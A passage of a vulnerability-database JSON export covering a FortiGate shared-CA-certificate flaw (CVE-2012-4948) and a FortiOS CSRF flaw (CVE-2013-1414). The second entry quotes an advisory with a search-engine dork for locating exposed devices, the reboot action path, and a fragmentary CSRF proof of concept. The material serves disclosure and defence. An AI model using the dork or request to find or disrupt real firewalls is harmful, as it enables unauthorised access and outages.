"id": "CNNVD-201211-077"
},
{
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:fortinet:fortigate",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Bitwiper",
"sources": [
{
"db": "BID",
"id": "56382"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
}
],
"trust": 0.9
},
"cve": "CVE-2012-4948",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "HIGH",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.2,
"id": "CVE-2012-4948",
"impactScore": 7.8,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:A/AC:H/Au:N/C:C/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "HIGH",
"accessVector": "ADJACENT NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 4.6,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "COMPLETE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 3.7,
"exploitability": "FUNCTIONAL",
"exploitabilityScore": 3.2,
"id": "CVE-2012-4948",
"impactScore": 6.9,
"integrityImpact": "NONE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "UNCOFIRMED",
"severity": "MEDIUM",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInteractionRequired": null,
"vector_string": "AV:A/AC:H/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.2,
"id": "VHN-58229",
"impactScore": 7.8,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:A/AC:H/AU:N/C:C/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-4948",
"trust": 1.6,
"value": "MEDIUM"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2012-4948",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201211-077",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-58229",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#111708"
},
{
"db": "VULHUB",
"id": "VHN-58229"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
},
{
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The default configuration of Fortinet Fortigate UTM appliances uses the same Certification Authority certificate and same private key across different customers\u0027 installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the presence of the Fortinet_CA_SSLProxy certificate in a list of trusted root certification authorities. The private key, which has been compromised, allows attackers to create and sign fake certificates. FortiGate of UTM The appliance includes CA There is a problem with the handling of the certificate. FortiGate of UTM The appliance is common by default CA It uses a certificate and its private key is publicly available on the web. Therefore, this CA All devices that use certificates may be affected by this vulnerability.Man-in-the-middle attacks by third parties (man-in-the-middle attack) May be eavesdropped on, or malware may be installed. Fortigate UTM appliances is prone to a security-bypass vulnerability. \nSuccessfully exploiting this issue allows attackers to perform man-in-the-middle attacks and gain access to sensitive information; other attacks are also possible. Fortinet FortiGate is a network security platform developed by Fortinet. The platform provides functions such as firewall, antivirus and intrusion prevention (IPS), application control, antispam, wireless controller and WAN acceleration",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-4948"
},
{
"db": "CERT/CC",
"id": "VU#111708"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"db": "BID",
"id": "56382"
},
{
"db": "VULHUB",
"id": "VHN-58229"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.kb.cert.org/vuls/id/111708",
"trust": 0.8,
"type": "unknown"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#111708"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-4948",
"trust": 3.6
},
{
"db": "CERT/CC",
"id": "VU#111708",
"trust": 3.3
},
{
"db": "BID",
"id": "56382",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "87048",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201211-077",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-58229",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#111708"
},
{
"db": "VULHUB",
"id": "VHN-58229"
},
{
"db": "BID",
"id": "56382"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
},
{
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"id": "VAR-201211-0266",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-58229"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-11T23:18:57.237000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Unified Threat Management (UTM)",
"trust": 0.8,
"url": "http://www.fortinet.com/solutions/unified_threat_management.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-295",
"trust": 1.1
},
{
"problemtype": "CWE-16",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-58229"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.kb.cert.org/vuls/id/111708"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/56382"
},
{
"trust": 1.1,
"url": "http://osvdb.org/87048"
},
{
"trust": 0.8,
"url": "http://docs.fortinet.com/fos40hlp/43/wwhelp/wwhimpl/common/html/wwhelp.htm?context=fgt\u0026file=misc_utm_chapter.61.13.html"
},
{
"trust": 0.8,
"url": "http://kb.fortinet.com/kb/viewcontent.do?externalid=fd32404"
},
{
"trust": 0.8,
"url": "http://www.fortinet.com/solutions/unified_threat_management.html"
},
{
"trust": 0.8,
"url": "https://media.torproject.org/misc/2012-07-03-cyberoam-cve-2012-3372.txt"
},
{
"trust": 0.8,
"url": "http://docs.fortinet.com/fos40hlp/43/wwhelp/wwhimpl/js/html/wwhelp.htm"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-4948"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu111708"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-4948"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#111708"
},
{
"db": "VULHUB",
"id": "VHN-58229"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
},
{
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#111708"
},
{
"db": "VULHUB",
"id": "VHN-58229"
},
{
"db": "BID",
"id": "56382"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
},
{
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-02T00:00:00",
"db": "CERT/CC",
"id": "VU#111708"
},
{
"date": "2012-11-14T00:00:00",
"db": "VULHUB",
"id": "VHN-58229"
},
{
"date": "2012-11-02T00:00:00",
"db": "BID",
"id": "56382"
},
{
"date": "2012-11-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"date": "2012-11-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201211-077"
},
{
"date": "2012-11-14T12:30:59.507000",
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-02T00:00:00",
"db": "CERT/CC",
"id": "VU#111708"
},
{
"date": "2016-12-07T00:00:00",
"db": "VULHUB",
"id": "VHN-58229"
},
{
"date": "2012-11-02T00:00:00",
"db": "BID",
"id": "56382"
},
{
"date": "2012-11-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"date": "2012-11-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201211-077"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Fortigate UTM appliances share the same default CA certificate",
"sources": [
{
"db": "CERT/CC",
"id": "VU#111708"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
}
],
"trust": 0.6
}
}
VAR-201307-0030
Vulnerability from variot - Updated: 2025-04-11 23:05Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown. (1) Change settings (2) Policy changes (3) Reboot device. FortiGate running FortiOS is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the device running the affected application. Other attacks are also possible. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. Vulnerability ID: CVE-2013-1414 Vulnerability Type: CSRF (Cross-Site Request Forgery) Product: All Fortigate Firewalls Vendor: Fortinet http://www.fortinet.com Vulnerable Version: < 4.3.13 & < 5.0.2
Description
Because many functions are not protected by CSRF-Tokens, it's possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall.
Requirements
An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device.
Report-Timeline:
Vendor Notification: 11 July 2012 Vendor released version 5.0.2 / 18 March 2013 Vendor released version 4.3.13 / 29 April 2013 Status: Fixed
Google Dork:
-english -help -printing -companies -archive -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser"
Credit:
Sven Wurth dos@net-war.de
PoC
This Example will reboot a Fortinet Firewall. This is just one of many possibilities to attack this vulnerability.
CSRF - Proof Of Concept
document.myForm.submit();End Poc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201307-0030",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fortios",
"scope": "eq",
"trust": 1.9,
"vendor": "fortinet",
"version": "5.0.1"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.9,
"vendor": "fortinet",
"version": "5.0"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": "4.3.10"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.1,
"vendor": "fortinet",
"version": "5.0.2"
},
{
"model": "fortigate-3240c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortios",
"scope": "lte",
"trust": 1.0,
"vendor": "fortinet",
"version": "4.3.12"
},
{
"model": "fortigate-300c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-100d",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-600c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3950b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-40c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-620b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-1000c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-voice-80c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-50b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-20c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-200b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-1240b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-310b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-311b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5020",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3810a",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5101c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5140b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-80c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-60c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigaterugged-100c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5001b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-800c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5060",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-110c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3040b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5001a-sw",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3140b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-110c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-1240b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-300c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3140b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-600c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-100d",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3950b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-200b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-1000c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5020",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5001a-sw",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-620b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-50b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3240c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-20c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3040b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-800c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-80c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortios",
"scope": "lt",
"trust": 0.8,
"vendor": "fortinet",
"version": "5.x"
},
{
"model": "fortigate-5060",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-voice-80c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-310b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3810a",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5101c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5001b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-40c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-311b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-60c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate rugged-100c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5140b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.6,
"vendor": "fortinet",
"version": "4.3.12"
},
{
"model": "fortios b0630",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.8"
},
{
"model": "fortios b0537",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.8"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.8"
},
{
"model": "fortios b064",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0"
},
{
"model": "fortigate-60c",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.0"
},
{
"model": "fortigate-100d",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0"
},
{
"model": "fortigate-1000",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3.00"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.6"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.5"
},
{
"model": "fortigate 800f",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "800"
},
{
"model": "fortigate 620b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 60m",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "60"
},
{
"model": "fortigate 50am",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 50a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 500a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5000"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "500"
},
{
"model": "fortigate 400a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4000"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "400"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3950"
},
{
"model": "fortigate 3810a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 3600a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3600"
},
{
"model": "fortigate 311b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 310b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 3016b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 300a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3000"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "300"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3.00"
},
{
"model": "fortigate 224b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 200b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 200a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "200"
},
{
"model": "fortigate 1240b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 100a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 1000afa2",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 1000a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "1000"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "100"
},
{
"model": "fortios",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.3"
},
{
"model": "fortios",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.13"
}
],
"sources": [
{
"db": "BID",
"id": "60861"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-116"
},
{
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:fortinet:fortigaterugged-100c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-1000c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-100d",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-110c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-1240b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-200b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-20c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-300c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-3040b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-310b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-311b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-3140b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-3240c",
"vulnerable": true
},
{
